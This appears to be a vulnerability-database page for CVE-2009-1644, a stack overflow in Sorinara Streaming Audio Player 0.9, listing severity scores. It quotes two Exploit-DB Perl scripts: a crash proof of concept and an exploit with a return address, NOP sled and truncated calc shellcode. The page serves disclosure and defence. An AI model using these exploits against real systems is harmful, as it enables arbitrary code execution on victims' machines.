CVE-2009-1644
published 2009-05-15CVE-2009-1644: Stack-based buffer overflow in Sorinara Streaming Audio Player 0.9 allows remote attackers to execute arbitrary code via a crafted .pla file.
PriorityP345critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.82%
92.2th percentile
Stack-based buffer overflow in Sorinara Streaming Audio Player 0.9 allows remote attackers to execute arbitrary code via a crafted .pla file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sorinara | streaming_audio_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)
exploitdb·2009-05-07
CVE-2009-1644 Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)
Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)
---
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ### # ## ## ## ###
# # Sorinara Streaming Audio Player 0.9 (.PLA) Local Stack Overflow PoC # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### # ### ## ## ###
my $chars= "A" x 506;
my $file="GOLD-M.PLA";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";
# milw0rm.com [2009-05-07]
Exploit-DB
Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow
exploitdb·2009-05-07
CVE-2009-1644 Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow
Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow
---
# by : Hakxer -> EgY Coders Team
# Streaming Audio Player 0.9 (.PLA File) Local Stack Overflow Exploit
# [email protected]
# Greetz : Allah
# , ExH , ProViDoR , Error Code , Br1ght D@rk , all my friends
##########################################################################
$buff="\x41" x 288;
$ret="\x77\xE9\xAE\x59"; # 0x77E9AE59 call esp
$nops="\x90" x 20;
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
$shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41
No writeups or analysis indexed.
http://www.securityfocus.com/bid/34861https://exchange.xforce.ibmcloud.com/vulnerabilities/50369https://www.exploit-db.com/exploits/8625https://www.exploit-db.com/exploits/8640http://www.securityfocus.com/bid/34861https://exchange.xforce.ibmcloud.com/vulnerabilities/50369https://www.exploit-db.com/exploits/8625https://www.exploit-db.com/exploits/8640
2009-05-15
Published